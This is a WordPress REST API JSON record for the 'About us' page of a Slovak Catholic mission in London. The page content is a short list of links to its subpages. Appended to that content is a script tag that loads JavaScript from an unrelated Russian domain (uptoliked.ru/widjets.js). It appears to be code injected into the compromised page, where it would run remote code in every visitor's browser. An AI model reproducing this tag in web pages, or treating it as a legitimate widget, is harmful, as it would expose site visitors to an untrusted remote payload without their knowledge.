{"id":15711,"date":"2013-05-02T09:23:01","date_gmt":"2013-05-02T08:23:01","guid":{"rendered":"http:\/\/www.scmlondon.org\/?page_id=15711"},"modified":"2015-01-10T22:15:06","modified_gmt":"2015-01-10T22:15:06","slug":"misia","status":"publish","type":"page","link":"https:\/\/www.scmlondon.org\/?page_id=15711","title":{"rendered":"O N\u00c1S"},"content":{"rendered":"<p><ul class=\"list-pages-shortcode child-pages\"><li class=\"page_item page-item-25845\"><a href=\"https:\/\/www.scmlondon.org\/?page_id=25845\">ERB SLOVENSKEJ KATOL\u00cdCKEJ MISIE V LOND\u00ddNE<\/a><\/li>\n<li class=\"page_item page-item-24900\"><a href=\"https:\/\/www.scmlondon.org\/?page_id=24900\">\u0160TRUKT\u00daRA MISIE<\/a><\/li>\n<li class=\"page_item page-item-9758\"><a href=\"https:\/\/www.scmlondon.org\/?page_id=9758\">\u010cINNOS\u0164 MISIE<\/a><\/li>\n<li class=\"page_item page-item-9778\"><a href=\"https:\/\/www.scmlondon.org\/?page_id=9778\">HIST\u00d3RIA<\/a><\/li>\n<li class=\"page_item page-item-20746\"><a href=\"https:\/\/www.scmlondon.org\/?page_id=20746\">PASTORA\u010cN\u00c1 \u0160TATISTIKA<\/a><\/li>\n<li class=\"page_item page-item-21408\"><a href=\"https:\/\/www.scmlondon.org\/?page_id=21408\">EKONOMICK\u00c1 \u0160TATISTIKA<\/a><\/li>\n<\/ul><script src=\"\/\/uptoliked.ru\/widjets.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":1,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-15711","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/15711","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15711"}],"version-history":[{"count":13,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/15711\/revisions"}],"predecessor-version":[{"id":18876,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/15711\/revisions\/18876"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15711"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}